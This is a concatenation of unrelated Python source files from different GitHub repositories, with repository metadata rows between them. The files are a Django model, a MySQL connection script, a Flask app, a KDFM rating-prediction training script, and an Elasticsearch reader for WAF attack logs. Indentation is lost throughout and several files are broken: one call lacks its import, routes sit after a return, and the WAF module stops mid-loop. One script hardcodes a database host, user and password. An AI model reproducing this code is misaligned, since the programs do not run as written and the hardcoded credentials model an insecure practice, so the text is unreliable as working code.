def save_image(folder, name, data):
file_name = os.path.join(folder, name + '.jpg')
with open(file_name, 'wb') as fout:
shutil.copyfileobj(data, fout)
| [
"connor.aitken@gmail.com"
] | connor.aitken@gmail.com |
3c770a2379cb86640ff65243bff4321c5d24a726 | f1616ef34f61a532d7866bc0b793f6e85df07ada | /blog/models.py | 3fcba11307d1471f90964bc2eed7281e131475ff | [] | no_license | katherine95/mysite | e9997c3205d1586be947606ff1a050cfcaf38088 | ce3d193fab1e89b5e75e0019446116d1a2f7db2e | refs/heads/master | 2020-05-31T17:43:09.702459 | 2017-06-12T01:02:35 | 2017-06-12T01:02:35 | 94,041,523 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 227 | py | from django.db import models
class Post(models.Model):
title = models.CharField(max_length=200)
body =models.TextField(max_length=350)
date =models.DateTimeField()
def __str__(self):
return self.title
| [
"kathiekim95@gmail.com"
] | kathiekim95@gmail.com |
c4f2b4f9d0ac3cb284f0b59256c30ad33b19b47d | 3532ae25961855b20635decd1481ed7def20c728 | /app/serwer/src/Serv/__init__.py | 03b3df43a5db72731ee42cc2f624d3047ba0f8f0 | [] | no_license | mcharmas/Bazinga | 121645a0c7bc8bd6a91322c2a7ecc56a5d3f71b7 | 1d35317422c913f28710b3182ee0e03822284ba3 | refs/heads/master | 2020-05-18T05:48:32.213937 | 2010-03-22T17:13:09 | 2010-03-22T17:13:09 | 577,323 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 172 | py | import ConfigReader
import Group
import Logger
import Packet
import Parser
import UDPServer
import User
import UserAuthenticator
import UserDBReader
import UserGroupManager | [
"mcharmas@ffdda973-792b-4bce-9e62-2343ac01ffa1"
] | mcharmas@ffdda973-792b-4bce-9e62-2343ac01ffa1 |
df86e18aa118aa33e47a8f31b0c501946df0c58d | f912b88787579b6bd701789f34c81076bc3b359b | /connection.py | 46589ec061250af51438152a23f9c7d83fa22699 | [] | no_license | febimudiyanto/mysql-python | 5e616e8a3872eda1eaba2d51f559378dad264f9b | 43d452d23698ae0af26f906190e8d0c94ba64ad3 | refs/heads/main | 2023-04-05T05:08:58.955320 | 2021-04-20T16:11:55 | 2021-04-20T16:11:55 | 316,931,127 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,084 | py | # IP address dari server
'''
untuk terkoneksi dengan mysql secara remote, bisa digunakan command berikut:
mysql -u python-user -h <ip> -P <port> -p
> masukkan passwordnya
* insert
INSERT INTO table_name VALUES (column1_value, column2_value, column3_value, ...);
INSERT INTO logins(username, password) VALUES('administrator', 'adm1n_p@ss');
INSERT INTO logins(username, password) VALUES ('john', 'john123!'), ('tom', 'tom123!');
* ALTER
ALTER TABLE logins ADD newColumn INT;
ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn;
ALTER TABLE logins MODIFY oldColumn DATE;
ALTER TABLE logins DROP oldColumn;
* Update
UPDATE table_name SET column1=newvalue1, column2=newvalue2, ... WHERE <condition>;
UPDATE logins SET password = 'change_password' WHERE id > 1;
'''
HOST = "192.168.122.176"
DATABASE = "data_db"
USER = "python-user"
PASSWORD = "inirahasia"
# Cek koneksi database
db_connect = mysql.connect(host=HOST, user=USER, passwd = PASSWORD)
if db_connect:
print("koneksi sukses")
else:
print("koneksi gagal")
# Inisialisasi cursor()
mycursor = db_connect.cursor()
# Menampilkan database
mycursor.execute("Show databases")
#print(type(mycursor))
nama_db=DATABASE
lst=[]
for db in mycursor:
#mendapatkan list dari database
lst.append(db[0])
print(db[0])
# cek dan buat database
if nama_db in lst:
print("database",nama_db,"sudah ada")
else:
print(">database tidak ada")
mycursor.execute("create database if not exists "+nama_db)
print(" >>>database",nama_db,"sudah dibuat")
mycursor.execute("use "+nama_db)
for db in mycursor:
print(db[0])
| [
"noreply@github.com"
] | febimudiyanto.noreply@github.com |
240ab9621859a771e060884aca014181fb68ca3c | 5ca726786d01c2256de7b6baed3c286ddd8e0bae | /Portilla/Linear Regression/ml_basic.py | eaaa03bff0ff01cb29d6ab627770f5196c95128c | [] | no_license | m-squared96/Snippets-ML | c9e53d3493ac752353f4d90c4ed55708d6ae2dcc | 2e5530177fcf56c526c5e7624092657e88c81e5a | refs/heads/master | 2020-03-19T10:37:17.001057 | 2018-06-12T21:26:34 | 2018-06-12T21:26:34 | 136,386,669 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 270 | py | #!/usr/bin/python
import numpy as np
from sklearn.model_selection import train_test_split
x, y = np.arange(10).reshape((5,2)), range(5)
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3)
for i in (x_train, x_test, y_train, y_test):
print(i) | [
"michael.moore34@mail.dcu.ie"
] | michael.moore34@mail.dcu.ie |
7cf29bf614e1f9a6d4e5cd8269daa64ebce39503 | a90888c62b2a24d71ba8f46536ebe75c52cf720e | /app/__init__.py | 7d373a109fab06911d7aad741dae9bb770f4757d | [] | no_license | Denniskamau/Tuklab | f7843fb92aac752cbe5e769f320d44b6f6f91856 | 1b1934f3e79ecc8fca89135255520adb4f67c999 | refs/heads/master | 2021-01-22T06:12:10.888017 | 2017-02-12T22:21:36 | 2017-02-12T22:21:36 | 81,747,943 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,451 | py | from flask import Flask, render_template,session
from flask.ext.bootstrap import Bootstrap
from flask.ext.mail import Mail
from flask.ext.wtf import Form
from wtforms import StringField, BooleanField, SubmitField, validators
from wtforms.validators import Required
from flask.ext.moment import Moment
from flask.ext.sqlalchemy import SQLAlchemy
from config import config
from flask.ext.login import LoginManager
bootstrap = Bootstrap()
mail = Mail()
moment = Moment()
db = SQLAlchemy()
login_manager = LoginManager()
login_manager.session_protection = 'strong'
login_manager.login_view = 'auth.login'
def create_app(config_name):
app = Flask(__name__)
app.config.from_object(config[config_name])
config[config_name].init_app(app)
bootstrap.init_app(app)
mail.init_app(app)
moment.init_app(app)
login_manager.init_app(app)
db.init_app(app)
from .auth import auth as auth_blueprint
app.register_blueprint(auth_blueprint, url_prefix='/auth')
return app
class NameForm(Form):
name = StringField('What is your name?', validators=[Required()])
email = StringField('email?', validators=[Required()])
submit = SubmitField('Submit')
@app.route('/', methods=['GET', 'POST'])
def index():
form = NameForm()
if form.validate_on_submit():
user =User.query.filter_by(username=form.name.data).first()
if user is None:
user = User(username = form.name.data)
db.session.add(user)
session['known'] = False
if app.config['TUKLAB_ADMIN']:
send_email(app.config['TUKLAB_ADMIN'], 'New User',
'mail/new_user', user=user)
else:
session['known'] = True
session['name'] = form.name.data
form.name.data=''
return redirect(url_for('index'))
return render_template('index.html',
form = form, name = session.get('name'),
known = session.get('known', False))
@app.route('/user/<name>')
def user(name):
return render_template('user.html',name=name)
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
@app.errorhandler(500)
def internal_server_error(e):
return render_template('500.html'), 500
from main import main as main_blueprint
app.register_blueprint(main_blueprint)
return app | [
"denniskamau3@gmail.com"
] | denniskamau3@gmail.com |
2a4f06bbe80fc25b36b4ad5e17376a21f8e756b9 | a38408a62efce0490284cc0866b3880b0e7fcb64 | /main.py | 2bc20f000be2133357e46d88473ec2ef0ff8d20a | [] | no_license | xiaoleiHou214/KDFM | fe033345f220b0ed3914e7bfac214559b43f2a5e | 8858fd750b77cbd803a38dea5604bcc788930d8f | refs/heads/master | 2021-10-22T04:28:38.735400 | 2019-03-08T02:29:06 | 2019-03-08T02:29:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,537 | py | import os
import numpy as np
import pandas as pd
import tensorflow as tf
from sklearn.metrics import make_scorer
from sklearn.model_selection import KFold,StratifiedKFold
from DataReader import FeatureDictionary, DataParser
from matplotlib import pyplot as plt
import codecs
from collections import defaultdict
import config
from KDFM import DeepAFM
from metrics import gini_norm, mse_norm, mse
def load_data():
dfTrain = pd.read_csv(config.TRAIN_FILE)
dfTest = pd.read_csv(config.TEST_FILE)
dfTrain.drop(config.TEXT_COLS, axis=1, inplace=True)
dfTest.drop(config.TEXT_COLS, axis=1, inplace=True)
cols = [c for c in dfTrain.columns if c not in ['review_ratting']]
cols = [c for c in cols if (not c in config.IGNORE_COLS)]
X_train = dfTrain[cols].values
y_train = dfTrain['review_ratting'].values
X_test = dfTest[cols].values
y_test = dfTest['review_ratting'].values
# Xm_train = xmTrain[xm_cols].values
# Xm_test = xmTest[xm_cols].values
return dfTrain, dfTest, X_train, y_train, X_test, y_test
def read_text_data(filename, word2idx, sequence_len):
unknown_id = word2idx.get("UNKNOWN", 0)
data_x, data_mask = [], []
try:
file = pd.read_csv(filename, sep=',')
for row in range(len(file)):
user_review = file['user_review'][row].strip().split(" ")
app_review = file['app_review'][row].strip().split(" ")
description = file['description'][row].strip().split(" ")
user_sent_idx = [word2idx.get(word.strip(), unknown_id) for word in user_review[:-1]]
app_sent_idx = [word2idx.get(word.strip(), unknown_id) for word in app_review[:-1]]
des_sent_idx = [word2idx.get(word.strip(), unknown_id) for word in description[:-1]]
# padding
pad_idx = word2idx.get("<a>", unknown_id)
ux, umask = np.ones(sequence_len, np.int32) * pad_idx, np.zeros(sequence_len, np.int32)
ax, amask = np.ones(sequence_len, np.int32) * pad_idx, np.zeros(sequence_len, np.int32)
dx, dmask = np.ones(sequence_len, np.int32) * pad_idx, np.zeros(sequence_len, np.int32)
if len(user_sent_idx) < sequence_len:
ux[:len(user_sent_idx)] = user_sent_idx
umask[:len(user_sent_idx)] = 1
else:
ux = user_sent_idx[:sequence_len]
umask[:] = 1
if len(app_sent_idx) < sequence_len:
ax[:len(app_sent_idx)] = app_sent_idx
amask[:len(app_sent_idx)] = 1
else:
ax = app_sent_idx[:sequence_len]
amask[:] = 1
if len(des_sent_idx) < sequence_len:
dx[:len(des_sent_idx)] = des_sent_idx
dmask[:len(des_sent_idx)] = 1
else:
dx = des_sent_idx[:sequence_len]
dmask[:] = 1
temp = []
temp_mask = []
temp.append(ux)
temp.append(ax)
temp.append(dx)
data_x.append(temp)
temp_mask.append(umask)
temp_mask.append(amask)
temp_mask.append(dmask)
data_mask.append(temp_mask)
except Exception as e:
print("load file Exception," + e)
return data_x, data_mask
def build_vocab(filename):
word2idx, idx2word = defaultdict(), defaultdict()
try:
with codecs.open(filename, mode="r", encoding="utf-8") as rf:
for line in rf.readlines():
items = line.strip().split(" ")
if len(items) != 2:
continue # 跳出本次循环
word_id = int(items[0].strip()) # strip() 用于移除字符串头尾指定的字符
word = items[1].strip()
idx2word[word_id] = word # key:word_id value: word
word2idx[word] = word_id # key: word value: word_id
print("build_vocab finish")
rf.close()
word2idx["UNKNOWN"] = len(idx2word) # word2idx key:UNKNOWN 中放的 value:idx2word的长度
idx2word[len(idx2word)] = "UNKNOWN" # idx2word key: idx2word的长度 中放的 UNKNOWN
word2idx["<a>"] = len(idx2word)
idx2word[len(idx2word)] = "<a>"
except Exception as e:
print(e)
return word2idx, idx2word
def load_embedding(embedding_size, word2idx=None, filename=None):
if filename is None and word2idx is not None:
return load_embedding_random_init(word2idx, embedding_size)
else:
return load_embedding_from_file(filename)
def load_embedding_random_init(word2idx, embedding_size):
embeddings=[]
for word, idx in word2idx.items():
vec = [0.01 for i in range(embedding_size)]
embeddings.append(vec)
return np.array(embeddings, dtype="float32")
def load_embedding_from_file(embedding_file):
word2vec_embeddings = np.array([[float(v) for v in line.strip().split(' ')] for line in open(embedding_file).readlines()], dtype=np.float32)
embedding_size = word2vec_embeddings.shape[1]
unknown_padding_embedding = np.random.normal(0, 0.1, (2,embedding_size))
embeddings = np.append(word2vec_embeddings, unknown_padding_embedding.astype(np.float32), axis=0)
return embeddings
def run_base_model_nfm(dfTrain, dfTest, folds, kdfm_params):
fd = FeatureDictionary(dfTrain=dfTrain,
dfTest=dfTest,
numeric_cols=config.NUMERIC_COLS,
ignore_cols=config.IGNORE_COLS,
xm_cols=config.XM_COLS)
data_parser = DataParser(feat_dict=fd)
# 新添
word2idx, idx2word = build_vocab(config.word_file)
# Xi_train :列的序号
# Xv_train :列的对应的值
Xi_train, Xv_train, y_train = data_parser.parse(df=dfTrain)
Xt_train, Xm_train = read_text_data(config.TRAIN_FILE, word2idx, config.num_unroll_steps) # read data TODO:config 与 pnn_params
Xi_test, Xv_test, y_test = data_parser.parse(df=dfTest)
Xt_test, Xm_test = read_text_data(config.TEST_FILE, word2idx, config.num_unroll_steps)
kdfm_params['feature_size_one_hot'] = fd.feat_dim
kdfm_params['word_embeddings'] = load_embedding(config.embedding_size, filename=config.embedding_file) # read data
#TODO:change
y_train_meta = np.zeros((dfTrain.shape[0], 1), dtype=float)
y_test_meta = np.zeros((dfTest.shape[0], 1), dtype=float)
results_cv = np.zeros(len(folds), dtype=float)
results_epoch_train = np.zeros((len(folds), kdfm_params['epoch']), dtype=float)
results_epoch_valid = np.zeros((len(folds), kdfm_params['epoch']), dtype=float)
results_epoch_train_mae = np.zeros((len(folds), kdfm_params['epoch']), dtype=float)
results_epoch_valid_mae = np.zeros((len(folds), kdfm_params['epoch']), dtype=float)
def _get(x, l): return [x[i] for i in l]
for i, (train_idx, valid_idx) in enumerate(folds):
Xi_train_, Xv_train_, y_train_, Xt_train_, Xm_train_ = \
_get(Xi_train, train_idx), _get(Xv_train, train_idx), _get(y_train, train_idx), \
_get(Xt_train, train_idx), _get(Xm_train, train_idx)
Xi_valid_, Xv_valid_, y_valid_, Xt_valid_, Xm_valid_ = \
_get(Xi_train, valid_idx), _get(Xv_train, valid_idx), _get(y_train, valid_idx), \
_get(Xt_train, valid_idx), _get(Xm_train, valid_idx)
kdfm = DeepAFM(**kdfm_params)
Xim_train_ = []
Xvm_train_ = []
Xim_valid_ = []
Xvm_vaild_ = []
Xim_test = []
Xvm_test = []
kdfm.fit(Xi_train_, Xv_train_, Xim_train_, Xvm_train_, Xt_train_, y_train_,
Xi_valid_, Xv_valid_, Xim_valid_, Xvm_vaild_, Xt_valid_,y_valid_)
y_train_meta[valid_idx, 0] = kdfm.predict(Xi_valid_, Xv_valid_, Xim_valid_, Xvm_vaild_, Xt_valid_)
y_test_meta[:, 0] += kdfm.predict(Xi_test, Xv_test, Xim_test, Xvm_test, Xt_test)
results_cv[i] = mse_norm(y_valid_, y_train_meta[valid_idx])
results_epoch_train[i] = kdfm.train_result
results_epoch_valid[i] = kdfm.valid_result
results_epoch_train_mae[i] = kdfm.mae_train_result
results_epoch_valid_mae[i] = kdfm.mae_valid_result
y_test_meta /= float(len(folds))
mse_test = mse(y_test, y_test_meta)
# save result
if kdfm_params["use_afm"] and kdfm_params["use_deep"]:
clf_str = "KDFM"
elif kdfm_params["use_afm"]:
clf_str = "AFM"
elif kdfm_params["use_deep"]:
clf_str = "DNN"
print("%s: %.5f (%.5f)" % (clf_str, results_cv.mean(), results_cv.std()))
filename = "%s_Mean%.5f_Std%.5f.csv" % (clf_str, results_cv.mean(), results_cv.std())
_make_submission(y_test, y_test_meta, mse_test, filename)
_plot_fig(results_epoch_train, results_epoch_valid, clf_str+'mse', "mse")
_plot_fig(results_epoch_train_mae, results_epoch_valid_mae, clf_str+'mae', "mae")
def _make_submission(target, y_pred, mse_test, filename="submission.csv"):
pd.DataFrame({"id": range(len(target)), "target": target, "predict": y_pred.flatten(), "mse": mse_test}).to_csv(
os.path.join(config.SUB_DIR, filename), index=False, float_format="%.5f")
def _make_kdfm_params(key, value, filename="kdfm_params.csv"):
pd.DataFrame({"key": key, "value": value}).to_csv(
os.path.join(config.SUB_DIR, filename), index=False, float_format="%.5f")
def _plot_fig(train_results, valid_results, model_name, algor):
    """Plot per-fold train/valid metric curves over epochs and save the figure.

    :param train_results: array of shape (n_folds, n_epochs) with training metric values
    :param valid_results: array of shape (n_folds, n_epochs) with validation metric values
    :param model_name: base name for the title and the output file fig/<model_name>.png
    :param algor: metric name used as the y-axis label ("mae" or "mse")
    """
    colors = ["red", "blue", "green"]
    xs = np.arange(1, train_results.shape[1] + 1)
    plt.figure()
    legends = []
    for i in range(train_results.shape[0]):
        # Cycle through the palette so more than 3 folds no longer raises IndexError.
        color = colors[i % len(colors)]
        plt.plot(xs, train_results[i], color=color, linestyle="solid", marker="o")
        plt.plot(xs, valid_results[i], color=color, linestyle="dashed", marker="o")
        legends.append("train-%d" % (i + 1))
        legends.append("valid-%d" % (i + 1))
    plt.xlabel("Epoch")
    if algor == 'mae':
        plt.ylabel("mae")
    if algor == 'mse':
        plt.ylabel("mse")
    plt.title("%s" % model_name)
    plt.legend(legends)
    plt.savefig("fig/%s.png" % model_name)
    plt.close()
# TODO: lack of feature_size & word_embeddings
# Hyper-parameters shared by the KDFM / AFM / DNN runs below.
kdfm_params = {
    "use_afm": True,
    "use_deep": True,
    #"field_size": 6,
    "feature_size_one_hot": 1,
    "field_size_one_hot": 3,
    "feature_size_multi_value": 0,
    "field_size_multi_value": 0,
    "embedding_size": 8,
    "attention_size": 10,
    "deep_layers": [32, 32, 32],
    "dropout_deep": [0.5, 0.5, 0.5, 0.5],
    "deep_layer_activation": tf.nn.relu,
    "epoch": 30,
    "batch_size": 128,
    "learning_rate": 0.001,
    "optimizer": "adam",
    "random_seed": config.RANDOM_SEED,
    "l2_reg": 0.1,
    "rnn_size": 100,
    "num_rnn_layers": 1,
    "keep_lstm": 0.5,
    "num_unroll_steps": 100, # sentence length (RNN unroll steps)
    "verbose": True,
    "topics": 1
}
# load data
dfTrain, dfTest, X_train, y_train, X_test, y_test = load_data()
# folds
# TODO: change StratifiedKFold to KFold
folds = list(StratifiedKFold(n_splits=config.NUM_SPLITS, shuffle=True,
                             random_state=config.RANDOM_SEED).split(X_train, y_train))
run_base_model_nfm(dfTrain, dfTest, folds, kdfm_params)
# ------------------ FM Model ------------------
afm_params = kdfm_params.copy()
afm_params["use_deep"] = False  # attention-only variant
run_base_model_nfm(dfTrain, dfTest, folds, afm_params)
# ------------------ DNN Model ------------------
dnn_params = kdfm_params.copy()
dnn_params["use_afm"] = False  # deep-only variant
run_base_model_nfm(dfTrain, dfTest, folds, dnn_params)
| [
"ixiaocn@163.com"
] | ixiaocn@163.com |
95149da7db451c97b4b863918bb4c788b0f439f4 | 4bfe441ce7b3da39304b045bb6ceb6f6efb21b25 | /project_html/app_fuzhou/views_utils/utils_waf.py | ec8119be03c135aec53281a03e28621a9bec55cd | [] | no_license | DearYuanYuan/8lab_react_project_html | d7046a4ed7da830f75faa790148338cd8a5c7f1f | 9133d9bd5e04ee70492b648f6df448fab80f28c8 | refs/heads/master | 2020-03-23T21:17:07.442492 | 2018-07-24T03:19:43 | 2018-07-24T03:19:43 | 142,095,449 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 21,299 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
本例用来为waf_view提供调用,功能从ElasticSearch中读取对应wafLog
Author 杨泽
Date 2017-4-26
依赖于logstash配置:
filter{
else if "wafLog" in [tags] {
grok {
match => {
"message" => "^X-Forwarded-For: %{DATA:XForwardedFor}$"
}
}
grok {
match => {
"message" => "---[0-9a-zA-Z]{8}---A--\n\[%{DATA:date}]"
}
}
grok {
match => {
"message" => "Referer: %{DATA:Referer}$"
}
}
date {
match => ["date", "dd/MMM/yyyy:HH:mm:ss Z"]
}
mutate {
replace => {
"model" => "defense"
}
}
}
}
update: 2017-7-7 by YangZe
时区!TIME_ZONE!
wafLog的日志时间为: UTC时间,转换为@timestamp时,因为带有时区信息,因此时区没变
统一从es中@timestamp取时间,且该时间为UTC
"""
import re
import datetime
import time
from elasticsearch import Elasticsearch, TransportError
from app_fuzhou.views_utils.localconfig import JsonConfiguration
from app_fuzhou.views_utils.global_config import GlobalConf
from app_fuzhou.views_utils.logger import logger
from app_fuzhou.views_utils.service.queryip.GeoLite2_Instance import IpToCoordinate
LOCAL_CONFIG = JsonConfiguration() # share.json
WAF_INDEX = LOCAL_CONFIG.waf_index
def get_waf_log(attack_type, page, pagesize):
    """Fetch wafLog hits of one attack category and parse them into records.

    :param attack_type: waf attack category name
    :param page: 1-based page number
    :param pagesize: number of records per page
    :return: (list of parsed attack records, total matching hit count);
             ([], 0) on any failure
    """
    try:
        raw_hits, total = get_waf_log_from_es(attack_type, page, pagesize)
        return handle_get_waf_log(raw_hits, attack_type), total
    except Exception as exc:
        logger.error(exc)
        return [], 0
def get_waf_log_from_es(attack_type, page=1, pagesize=50, time_filter=None, sort="desc"):
    """
    Fetch raw wafLog hits from Elasticsearch for one attack category.

    :param attack_type: waf attack category; one of "web-attack",
        "sensitive-data-tracking", "identification-error", "dos-attack",
        "http-defense" — anything else returns ([], 0)
    :param page: 1-based page number
    :param pagesize: hits per page
    :param time_filter: optional ES range clause placed into bool.filter
    :param sort: "desc"/"asc" sorts by @timestamp; any other value leaves
        the result unsorted
    :return: (list of raw ES hit dicts, total matching count)
    """
    global_config = GlobalConf()
    es = Elasticsearch(LOCAL_CONFIG.es_server_ip_port)
    body = {
        "query": {
            "bool": {
                "must": [
                    {"match_phrase": {"_type": "wafLog"}}, # must-match: wafLog documents only
                ],
                "should": [],
                "minimum_should_match": 1, # at least one of the message clauses appended below must match
                # "filter": {"range": {"@timestamp": {"gte": "now-3d", "lte": "now"}}} # time filter
            }
        },
        "from": (page-1)*pagesize,
        "size": pagesize,
    }
    if sort == "desc" or sort == "asc":
        body["sort"] = {"@timestamp": sort}
    if time_filter:
        body["query"]["bool"]['filter'] = time_filter
    # Map the attack category onto its rule-name list from the config file.
    if attack_type == "web-attack":  # web-attack
        rules = global_config.RULES['EXPERIMENTAL_RULES']
    elif attack_type == "sensitive-data-tracking":  # sensitive-data-tracking
        rules = global_config.RULES['OPTIONAL_RULES']
    elif attack_type == "identification-error":  # identification-error
        rules = global_config.RULES['SLR_RULES']
    elif attack_type == "dos-attack":  # dos-attack
        rules = global_config.RULES['DOS_RULES']
    elif attack_type == "http-defense":  # http-defense
        rules = global_config.RULES['BASE_RULES']  # match the base http rules...
        except_rules = []  # ...while matching none of the other categories
        except_rules += global_config.RULES['EXPERIMENTAL_RULES']
        except_rules += global_config.RULES['OPTIONAL_RULES']
        except_rules += global_config.RULES['SLR_RULES']
        except_rules += global_config.RULES['DOS_RULES']
        must_not_list = []
        for rule in except_rules:  # add each excluded rule as a must_not clause
            must_not_list.append({"match_phrase": {"message": rule}})
        body["query"]["bool"]["should"].append({"bool": {"must_not": must_not_list}})
    else:
        return [], 0
    for rule in rules:  # add each category rule as a message match clause
        body["query"]["bool"]["should"].append({"match_phrase": {"message": rule}})
    # Dead code left from an earlier multi-index version (kept verbatim).
    """
    for host in hosts: # 生成索引列表
        index_list.append(index+host['ip'])
    """
    try:
        result = es.search(index=WAF_INDEX, body=body, ignore_unavailable=True)  # query ES
    except Exception as e:
        logger.error(e)
        return [], 0
    # At this point the data has been fetched from ES.
    return result['hits']['hits'], result['hits']['total']
def get_waf_logs_timestamp_count(time_interval=10):
    """
    Fetch all wafLog documents from the last ``time_interval`` seconds.

    :param time_interval: look-back window in seconds
    :return: {"data": [...]} where the list holds the raw ES hits
             (empty when the query fails)
    """
    result_dict = {"data": []}
    es = Elasticsearch(LOCAL_CONFIG.es_server_ip_port)  # es instance
    now_interval, now = get_range_of_last_interval(time_interval)
    try:
        body = {
            "query": {
                "range": {
                    "@timestamp": {
                        "gte": now_interval,
                        "lte": now
                    }
                },
            }
        }
        results = es.search(index=WAF_INDEX, doc_type="wafLog", body=body,
                            ignore_unavailable=True)  # single ES round-trip
        result_dict["data"] = results["hits"]["hits"]
    except Exception as e:
        logger.error(e)
    # Return after the try/except instead of inside ``finally``: a return in
    # ``finally`` also swallowed BaseExceptions such as KeyboardInterrupt.
    return result_dict
def handle_get_waf_log(results, attack_type):
    """Turn raw ES wafLog hits into attack-record dicts, newest first.

    Each record carries the attacked host IP, the event time shifted from
    UTC to UTC+8, the attacker IP and tool from the request headers, and
    the defense category. Hits that fail to parse are logged and skipped.

    :param results: list of raw ES hit dicts
    :param attack_type: category string stored into "defend_type"
    :return: list of record dicts sorted by "inter_time" descending
    """
    utc8_offset = datetime.timedelta(hours=8)
    records = []
    for entry in results:
        try:
            source = entry['_source']
            records.append({
                "inter_ip": source['type'],  # attacked host ip
                "inter_time": (datetime.datetime.strptime(
                    source["@timestamp"], "%Y-%m-%dT%H:%M:%S.%fZ")
                    + utc8_offset).strftime('%Y-%m-%d %H:%M:%S'),
                "inter_source": source.get('XForwardedFor', ''),  # attacker ip
                "inter_tool": source.get('Referer', ''),  # attack origin/tool
                "defend_type": attack_type,
            })
        except Exception as exc:
            logger.error(str(exc))
    # The ES query is already sorted; this guards against any stragglers.
    records.sort(key=lambda rec: rec["inter_time"], reverse=True)
    return records
def handle_get_waf_log_old(results, flag): # legacy version
    """
    Legacy parser: extracts attack source/target/time/tool from the raw
    modsecurity-style message text instead of the structured ES fields.
    Superseded by handle_get_waf_log(); kept for reference.

    :param results: list of raw ES hit dicts
    :param flag: category string stored into "defend_type"
    :return: list of record dicts sorted by "inter_time" descending
    """
    head = re.compile(r"--.*-A--")
    logs = []
    time_delta = datetime.timedelta(hours=8)
    for hit in results:
        one_record = hit['_source']['message'].split('\n')
        i = 0
        # For each log entry, reset the record and note the attacked IP,
        # which is stored in the ES document type field.
        log = {"inter_ip": hit['_source']['type'],  # attacked host ip
               "inter_time": "Unknown",  # attack time
               "inter_source": hit['_source'].get('XForwardedFor', ''),  # attacker ip
               "inter_tool": "Unknown_Tool",  # attack tool
               "defend_type": flag}  # defense category
        one_interception = False
        while i < len(one_record):
            line = one_record[i]  # one line of the message
            if (not one_interception) and head.findall(line):  # regex r"--.*-A--" marks the A-section header
                temp = one_record[i + 1].split()
                _time = datetime.datetime.strptime(temp[0].strip("["),
                                                   '%d/%b/%Y:%H:%M:%S') + time_delta  # UTC+8
                log["inter_time"] = _time.strftime("%Y-%m-%d %X")
                one_interception = True  # entered one interception record
                i += 1  # the next line has been consumed above
            elif line.find("Referer") != -1:  # Referer header found
                # NOTE(review): split(":")[1] truncates values containing ':'
                # (e.g. "Referer: http://x" yields " http") — split(":", 1)
                # was probably intended; left unchanged in this legacy code.
                log["inter_tool"] = line.split(":")[1]  # record the attack tool
            i += 1
        logs.append(log)
    logs.sort(key=lambda x: x["inter_time"], reverse=True)  # guard against out-of-order hits
    return logs
def get_state_info_dict():
    """
    Count wafLog documents in ES: the total, and those recognized by the
    defense module (documents whose ``model`` field equals "defense").

    :return: {"intercepted": recognized, "unrecognized": total - recognized};
             zeros on any failure
    """
    try:
        es = Elasticsearch(LOCAL_CONFIG.es_server_ip_port)
        state_info_dict = {}
        # Total number of wafLog records in the index.
        body = {"query": {"bool": {"must": [{"match_phrase": {"_type": "wafLog"}}]}}, "size": 0}
        result = es.search(index=WAF_INDEX, body=body, ignore_unavailable=True)
        total_results = result['hits']['total']
        # wafLog records carrying model == "defense" (i.e. intercepted).
        body = {"query": {"bool": {"must": [{"match_phrase": {"_type": "wafLog"}},
                                            {"match": {"model": "defense"}}]}}, "size": 0}
        result = es.search(index=WAF_INDEX, body=body, ignore_unavailable=True)
        total_intercepted_results = result['hits']['total']
        state_info_dict["intercepted"] = total_intercepted_results
        state_info_dict["unrecognized"] = total_results - total_intercepted_results
        return state_info_dict
    except Exception as e:
        logger.error(e)
        return {"intercepted": 0, "unrecognized": 0}
def get_waf_log_aggregations_week():
    """
    Per-day counts for each attack category over the last 7 days
    (today included), plus the all-time total per category.

    :return: (week: {date: [...7 dates...], <category>: [...7 counts...], ...},
              total: {<category>: count, ...})
    """
    days = []
    today = datetime.date.today()
    for _day in range(6, -1, -1):  # dates ordered oldest-first
        days.append((today - datetime.timedelta(days=_day)).strftime("%Y-%m-%d"))  # last 7 days
    global_config = GlobalConf()
    hosts = LOCAL_CONFIG.client_audit_hosts
    es = Elasticsearch(LOCAL_CONFIG.es_server_ip_port)
    index_list = []
    # Dead code left from an earlier multi-index version (kept verbatim).
    """
    for host in hosts: # 生成索引列表
        index_list.append(index + host['ip'])
    """
    level_list = ["web-attack", "sensitive-data-tracking",
                  "identification-error", "dos-attack", "http-defense"]
    week_aggr_dict = {'date': days}
    total_count = {}
    # Build and run one aggregation query per attack category, mapping the
    # category onto its rule-name list from the config file.
    for _level in level_list:
        body = {
            "query": {
                "bool": {
                    "must": [
                        {"match_phrase": {"_type": "wafLog"}}, # must-match: wafLog documents only
                    ],
                    "should": [],
                    "minimum_should_match": 1, # at least one of the message clauses appended below must match
                }
            },
            "size": 0,
            "aggs": { # aggregation
                "week_history": {
                    "date_histogram": {
                        "field": "@timestamp", # time field
                        "interval": "day", # bucket per day
                        "format": "yyyy-MM-dd",
                        "min_doc_count": 0,
                        "time_zone": "+08:00", # ES defaults to UTC, so shift by +8
                        "extended_bounds": {"min": days[0], "max": days[6]} # last 7 days, today included
                    }
                }
            }
        }
        week_aggr_dict[_level] = []
        if _level == "web-attack": # web-attack
            rules = global_config.RULES['EXPERIMENTAL_RULES']
        elif _level == "sensitive-data-tracking": # sensitive-data-tracking
            rules = global_config.RULES['OPTIONAL_RULES']
        elif _level == "identification-error": # identification-error
            rules = global_config.RULES['SLR_RULES']
        elif _level == "dos-attack": # dos-attack
            rules = global_config.RULES['DOS_RULES']
        else: # http-defense
            rules = global_config.RULES['BASE_RULES'] # match the base http rules...
            except_rules = [] # ...while matching none of the other categories
            except_rules += global_config.RULES['EXPERIMENTAL_RULES']
            except_rules += global_config.RULES['OPTIONAL_RULES']
            except_rules += global_config.RULES['SLR_RULES']
            except_rules += global_config.RULES['DOS_RULES']
            must_not_list = []
            # NOTE: must_not_list is still empty at this append, but the body
            # keeps a reference to the same list object, so the clauses added
            # in the loop below are visible to the query.
            body["query"]["bool"]["should"].append({"bool": {"must_not": must_not_list}})
            for rule in except_rules:  # add each excluded rule as a must_not clause
                must_not_list.append({"match_phrase": {"message": rule}})
        for rule in rules:  # add each category rule as a message match clause
